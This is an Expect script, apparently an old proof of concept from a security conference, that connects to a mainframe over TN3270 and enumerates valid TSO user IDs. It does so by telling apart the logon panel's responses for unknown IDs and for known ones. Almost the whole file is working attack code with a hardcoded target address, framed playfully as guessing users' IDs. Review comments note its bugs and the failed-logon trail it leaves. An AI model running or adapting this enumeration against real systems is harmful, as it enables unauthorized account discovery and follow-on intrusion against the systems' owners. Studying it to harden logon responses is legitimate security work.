#!/usr/bin/expect -f
#######################
# OLD SCRIPT. Replaced by TSO Brute!
#Script to take advantage of TSO disclosing if a UserID is invalid
# May require changing for your specific environment
# Initially developed by @mainframed767 for BSidesLV
# Requirements: C3270 and Expect
# Note: This script is super slow. It's just a proof of concept.
# Thanks to http://www.kicksfortso.com/same/KooKbooK/KooKbooK-6.htm
#######################
# Overview: drives one interactive c3270 session to the TSO logon panel
# and classifies each line of $userfile by which response text the panel
# returns: "not authorized" is recorded as failed, "Enter current password
# for" as valid. That difference in wording is the disclosure the header
# refers to; a logon panel that answers unknown and known IDs with the
# same message gives this script nothing to key on.
# Detection note: every candidate ID is submitted as a real logon attempt
# on the same 3270 connection, paced by $sleep, so the activity presumably
# appears host-side as a run of failed logons from one source address.
# NOTE(review): the script never verifies that c3270 actually connected;
# every later send assumes the session is alive.
puts "!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!"
puts "!!!! THIS IS A POC SCRIPT. TSO BRUTE HAS SUPERSEDED THIS PROGRAM. IT IS KEPT FOR HISTORICAL REASONS ONLY !!!!"
puts "!!!! THIS VERSION HAS KNOWN BUGS AND WAS JUST POC! !!!!"
puts "!!!! THE NEWEST VERSION CAN BE FOUND AT https://github.com/mainframed/TSO-Brute !!!!"
puts "!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!"
puts ""
puts ""
# Unconditional 30 second pause, presumably so the banner above is read
# before anything is spawned.
sleep 30
#change to whatver you want
# Configuration. None of these values are validated anywhere below; an
# unreadable $userfile surfaces only as an error from [open] further down.
set target "10.10.0.24" ;# Target IP address
set target_port "23" ;# Target Port
set sleep "2" ;# Change to 1 for faster systems
set userfile "userids.txt" ;# Change to the name of your user listing file
log_user 0 ;# if you want to see what it does change this to 1
###########################################################
# End configuration options
###########################################################
puts "//////////////////////////////////////////////////////"
puts "// I'm in ur mainframe //"
puts "// guessin' your users //"
puts "//////////////////////////////////////////////////////"
puts "//"
# Read channel for the ID list; closed after the loop at the bottom.
set usernames [open $userfile r]
# Number of IDs classified as valid; incremented inside the loop.
set found "0"
# Initiate a 3270 connction to the $target:$port using C3270
puts "// Connecting to $target:$target_port"
spawn c3270 -model 3279-2 -once $target:$target_port
sleep $sleep
########################################
# You'll need to customize this for your environment
#######################################
# Global expect timeout in seconds; applies to every expect below that
# has no explicit timeout of its own.
set timeout 5
expect {
"==>" { set reply tso }
"Enter your choice==>" { set reply tso }
timeout { set reply timeout }
}
# If it times out
# NOTE(review): the timeout arm above sets reply too, so a timeout does
# NOT reach this branch and the script proceeds to "Connection
# Successful". reply is only unset when expect returns without matching
# any arm, which presumably happens on eof (c3270 exiting early).
if {![info exists reply]} {
puts "//"
puts "// WARNING:"
puts "// Connection to $target:$target_port"
puts "// timed out or initial logon screen"
puts "// is different and you need to change"
puts "// the script."
puts "//"
puts "// Quiting!"
puts "//"
puts "//////////////////////////////////////////////////////"
exit
}
puts "// Connection Successful"
puts "//"
send "tso\r"
sleep $sleep
send "fake\r" ;# this is the first userid to try. It shouldnt exist and starts the ball rolling
sleep $sleep
#C3270 is now at the TSO/E logon panel, check if first userID was valid it shouldn't be
expect {
"not authorized" { set enum failed }
"Enter current password for" { set enum valid }
timeout { set enum timeout }
}
# NOTE(review): the enum value from this probe is never checked; it only
# becomes visible if the first expect inside the loop times out, because
# that expect has no timeout arm and then leaves enum untouched.
puts "// Enumerating through $userfile:"
# One candidate per line, sent verbatim; a blank line sends a bare "\r".
while {[gets $usernames inline] >= 0} {
puts -nonewline "// Trying $inline "
send "$inline\r"
# NOTE(review): no timeout arm here, so when neither string arrives
# within $timeout seconds enum keeps the previous iteration's value and
# that stale result is printed for this ID.
expect {
"not authorized" { set enum failed }
"Enter current password for" { set enum valid }
}
puts -nonewline "::: $enum"
if {$enum == "valid"} {
incr found
# After a valid ID the panel is sitting at the password prompt, so the
# session is torn down (c3270 escape, then "quit"), a fresh c3270 is
# spawned, and the panel is re-seeded with the "fake" probe before the
# next ID. The reply and enum values set during this reconnect are not
# checked, and "Found!" is printed regardless of how it went.
send "\035" ; # do ^] to get to c3270 menu
expect "c3270>" { sleep 1; send "quit\n"; }
spawn c3270 -model 3279-2 -once $target:$target_port
sleep $sleep
expect {
"==>" { set reply tso }
"Enter your choice==>" { set reply tso }
timeout { set reply timeout }
}
send "tso\r"
sleep $sleep
send "fake\r"
expect {
"not authorized" { set enum failed }
timeout { set enum timeout }
}
puts -nonewline " ::: Found!"
}
puts ""
sleep $sleep
}
close $usernames
puts "//"
puts "// Done!"
puts "//"
puts "//////////////////////////////////////////////////////"
puts "// Found $found user IDs!!!"
puts "// Closing Connection to $target:$target_port"
puts "//////////////////////////////////////////////////////"
# Tear down the final c3270 session; the script ends once this expect
# returns (match or timeout).
send "\035" ; # do ^] to get to c3270 menu
expect "c3270>" { sleep 1; send "quit\n"; }